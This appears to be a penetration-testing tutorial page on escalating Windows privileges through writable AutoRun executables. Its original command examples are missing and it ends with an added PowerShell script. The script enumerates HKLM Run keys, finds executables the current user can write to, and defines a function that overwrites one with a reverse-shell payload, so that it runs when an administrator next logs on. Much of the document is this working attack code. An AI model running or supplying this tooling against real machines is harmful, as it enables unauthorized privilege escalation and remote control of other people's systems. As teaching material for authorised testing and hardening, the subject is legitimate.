AutoRuns
Last updated
Windows can be configured to run programs automatically at logon. These "AutoRuns" are configured in the Registry (for example under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run). Entries under HKLM run for every user who logs on, in that user's security context, so if an administrator logs on the program runs with administrator privileges. If you are able to write to an AutoRun executable, and are able to restart the system (or wait for it to be restarted) so that a privileged user logs on again, you may be able to escalate privileges.
Use winPEAS to check for writable AutoRun executables:
Alternatively, we could manually enumerate the AutoRun executables:
and then use accesschk.exe to verify the permissions on each one:
The "C:\Program Files\Autorun Program\program.exe" AutoRun executable is writable by Everyone. Create a backup of the original:
Copy our reverse shell executable to overwrite the AutoRun executable:
Now start a listener on the attacker machine and wait for the system to reboot and a privileged user to log on. The AutoRun entry then launches the replaced executable and you receive a reverse shell running as that user.
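The whole procedure above (enumerate the Run keys, check the target executable's permissions, back it up, overwrite it) as one PowerShell script. This is an added example, not code from the original page: it uses Get-Acl in place of accesschk.exe, the list of Run keys and the "broad" identities it treats as interesting are assumptions, and the payload path C:\PrivEsc\reverse.exe is hypothetical. The target path is the one from the page's example.

```powershell
# Added example (not from the original page): enumerate Run/RunOnce entries,
# resolve each target executable and report any the current user can write to,
# then optionally back up and replace a writable one with a payload.

# Assumed set of AutoRun keys to inspect (HKLM only: these run for every user).
$runKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce'
)

# Identities whose write access matters: broad well-known groups plus the
# current user and every group the current token carries.
$me    = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$myIds = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', $me.Name)
foreach ($sid in $me.Groups) {
    try   { $myIds += $sid.Translate([System.Security.Principal.NTAccount]).Value }
    catch { }   # some logon/capability SIDs have no account name; ignore them
}

# A Run value may be quoted, carry arguments, or be an unquoted path containing
# spaces. Return the executable path it points at.
function Get-AutoRunTarget([string]$value) {
    if ($value -match '^"([^"]+)"') { return $Matches[1] }
    $tokens = $value -split ' '
    for ($i = 1; $i -le $tokens.Count; $i++) {
        $candidate = $tokens[0..($i - 1)] -join ' '
        if (Test-Path -LiteralPath $candidate -PathType Leaf) { return $candidate }
    }
    return $value
}

# Return the ACEs on $path that grant a write-capable right to one of $myIds.
# CreateFiles is how FileSystemRights.WriteData renders as a string.
function Get-WritableAces([string]$path) {
    (Get-Acl -LiteralPath $path).Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $_.FileSystemRights -match 'FullControl|Modify|\bWrite\b|CreateFiles' -and
        $myIds -contains $_.IdentityReference.Value
    }
}

foreach ($key in $runKeys) {
    if (-not (Test-Path $key)) { continue }
    foreach ($p in (Get-ItemProperty -Path $key).PSObject.Properties) {
        if ($p.Name -like 'PS*') { continue }          # provider metadata, not Run values
        $target = Get-AutoRunTarget ([string]$p.Value)
        if (-not (Test-Path -LiteralPath $target -PathType Leaf)) { continue }
        $aces = Get-WritableAces $target
        if ($aces) {
            "[WRITABLE] $key\$($p.Name) -> $target"
            $aces | ForEach-Object { "           $($_.IdentityReference): $($_.FileSystemRights)" }
        } else {
            "[ok]       $key\$($p.Name) -> $target"
        }
    }
}

# Replace a writable target, keeping a backup so the original can be restored
# after the engagement.
function Invoke-AutoRunReplace([string]$target, [string]$payload) {
    Copy-Item -LiteralPath $target  -Destination "$target.bak" -Force
    Copy-Item -LiteralPath $payload -Destination $target       -Force
}

# Example call: target path is the page's example, payload path is hypothetical.
# Invoke-AutoRunReplace 'C:\Program Files\Autorun Program\program.exe' 'C:\PrivEsc\reverse.exe'
```

Run the script as the low-privileged user whose access you are testing, since Get-Acl is evaluated against the current token's group list. Once a target reports [WRITABLE], back it up and overwrite it with the listener-bound payload, then wait for the reboot: the payload runs in the context of whichever user logs on next, so the shell is only elevated if that user is an administrator, and with UAC enabled it may carry that user's filtered token rather than the full one.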